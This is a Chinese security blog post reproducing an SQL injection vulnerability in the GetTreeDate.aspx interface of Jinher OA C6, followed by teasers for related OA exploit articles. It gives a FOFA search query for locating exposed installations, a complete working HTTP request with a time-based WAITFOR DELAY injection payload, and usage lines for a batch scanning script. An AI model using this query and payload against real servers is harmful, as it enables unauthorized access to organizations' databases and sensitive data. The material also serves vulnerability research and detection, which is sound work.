金和OA SQL注入漏洞

最新推荐文章于 2024-09-26 17:51:02 发布
最新推荐文章于 2024-09-26 17:51:02 发布
阅读量716 收藏 1
点赞数
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/CommputerMac/article/details/133954292
版权

一、漏洞描述

金和OA协同办公管理系统C6软件,为北京金和网络股份有限公司 开发系统,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。

金和OA GetTreeDate.aspx接口存在SQL注入漏洞,攻击者可利用该漏洞执行任意SQL语句,获取系统数据库敏感信息。

二、网络搜索引擎搜索

fofa查询

app="金和网络-金和OA"

三、漏洞复现

时间延迟注入POC (延迟 5秒)

GET /C6/Jhsoft.Web.users/GetTreeDate.aspx/?id=1;WAITFOR+DELAY+%270:0:5%27+--%20and%201=1 HTTP/1.1
Host: IP:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=4nichsprxl5ruhtbk5lywfdb
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

四、漏洞检测

单个检测

python jinherSQLCheck.py -u url[例 http://127.0.0.1:8080]

批量检测

python jinherSQLCheck.py -f filename

关注微信公众号 网络安全透视镜 回复 20231020 获取批量检测脚本

金和OA GetTreeDate.aspx SQL注入漏洞
xiaokp7的博客
09-22 701
金和OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断的更新完善,全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用。金和OA GetTreeDate存在SQL注入漏洞
金和OA GetSqlData.aspx 远程命令执行漏洞
xiaokp7的博客
09-13 901
金和OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断的更新完善,全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用。金和OA GetTreeDate存在SQL注入漏洞
漏洞复现--金和OASQL注入
qq_53003652的博客
10-23 625
金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。该产品GetTreeDate.aspx存在SQL注入漏洞sqlmap直接梭哈。
{大厂漏洞 } OA产品存在SQL注入
zkaqlaoniao的博客
10-18 294
江苏叁拾叁-OA是由江苏叁拾叁信息技术有限公司开发的一款OA办公平台,主要有知识管理,工作流程,沟通交流,辅助办公,集成解决方案,应用支撑平台,基础支撑等功能。该系统也与江苏叁拾叁智慧农业研究院的农产品电商解决方案、社会化服务解决方案、乡村振兴解决方案等进行了深度融合。该漏洞存在于login下,username对接受的传参没有进行严格的过滤,从而导致SQL注入,攻击者可以利用该漏洞获取数据库敏感信息。POC(payload sqlmap梭哈来的)直接sqlmap梭哈来。
漏洞通告| 某大厂OA SQL注入漏洞
2301_80115097的博客
10-27 212
广联达办公OA是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。
金和OA C6 DBModules.aspx SQL注入漏洞复现
0xSec
08-23 631
金和OA C6 DBModules.aspx 接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
金和OA C6 GetHomeInfo SQL注入漏洞
3tefanie丶zhou的博客
01-09 774
【真正的自由,从来不是了无牵挂。】
金和OA C6 SignUpload.ashx SQL注入漏洞复现
0xSec
09-26 656
金和OA C6 SignUpload.ashx 接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
金和OA C6 jQueryUploadify.ashx SQL注入漏洞复现
0xSec
08-31 655
金和OA C6 jQueryUploadify.ashx 接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
通达OA SQL注入漏洞【CVE-2023-4166】
holyxp的博客
08-10 6085
通达OA系统,即Offic Anywhere,又称为网络智能办公系统,是通达科技公司针对各行业办公与管理开发的办公应用系统。通达OA系统采用领先的B/S架构,采用基于WEB网络的开发方式,能够使得企业及个人办公不再受地域限制,实现信息化、自动化、移动化高效便捷办公。漏洞2(CVE-2023-4166)general/system/seal_manage/dianju/delete_log.php文件,对参数 DELETE_STR 的操作会导致 sql 注入
黑客必知:揭秘泛微OA SQL注入漏洞,轻松入侵系统的绝佳方法!
平凡
08-15 576
有子曰:“其为人也孝弟,而好犯上者,鲜矣。不好犯上,而好作乱者,未之有也。君子务本,本立而道生。孝弟也者,其为仁之本与?”
金和OA任意文件读取漏洞
xiaokp7的博客
09-13 574
金和OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断的更新完善,全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用金和OA系统存在任意文件读取漏洞,攻击者通过恶意构造的请求下载服务器上的任意文件,包括敏感文件、配置文件、数据库文件等。
金和OA Servlet接口任意文件上传漏洞
故事讲予风听
12-06 898
金和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准,支持组织数字化转型,实现业务流程的数字化、智能化和协同化,提高企业竞争力。
漏洞复现--金和OA clobfield SQL注入
qq_53003652的博客
12-19 898
金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。该产品存在SQL注入漏洞
金和OA GetAttOut接口存在SQL注入漏洞
nnn2188185的博客
01-12 247
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发金和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准,支持组织数字化转型,实现业务流程的数字化、智能化和协同化,提高企业竞争力。
漏洞复现】广联达OA漏洞合集(信息泄露+SQL注入+文件上传)
李火火的安全圈
09-18 4537
广联达 Linkworks 办公OA(Office Automation)是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。广联达OA曝出多处漏洞,攻击者可通过该漏洞获取服务器敏感数据信息,注入恶意Payload获得服务器控制权限。
广联达OA前台sql注入+后台文件上传漏洞复现分析
博客地址 www.sec0nd.top
08-15 3087
广联达OA前台sql注入+后台文件上传漏洞复现分析
2022-10-10(通达OA SQL注入漏洞)
qq_45751902的博客
10-10 2228
经过测试发现过滤了单引号,对r字符进行转换成16进制,通过手工最终获得数据库用户名root。使用手工注入,经过测试发现过滤了单引号,对r字符进行转换成16进制(用户名是root)首先创建一个普通账户 lisi:lisi123456。中存在 一个$_GET[“id”];参数位置:SORT_ID,FILE_SORT。发现时间明显变长了,再此证明id没有被过滤。登录账号是admin,密码为空。利用条件:一枚普通账号登录权限。利用条件:11.5版本无需登录。
OA系统漏洞记录
Aquarius_ego的博客
05-14 5116
OA系统介绍及相关漏洞(不断更新哦~)
oa漏洞复现
最新发布
03-11
#### 万户OA-ezOFFICE DocumentEdit_unite.jsp SQL注入漏洞 SQL注入类别的弱点往往存在于动态拼接SQL语句的过程中未能充分过滤用户提交内容所致。就万户OA-ezOFFICE而言,在DocumentEdit_unite.jsp页面可能存在这样...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值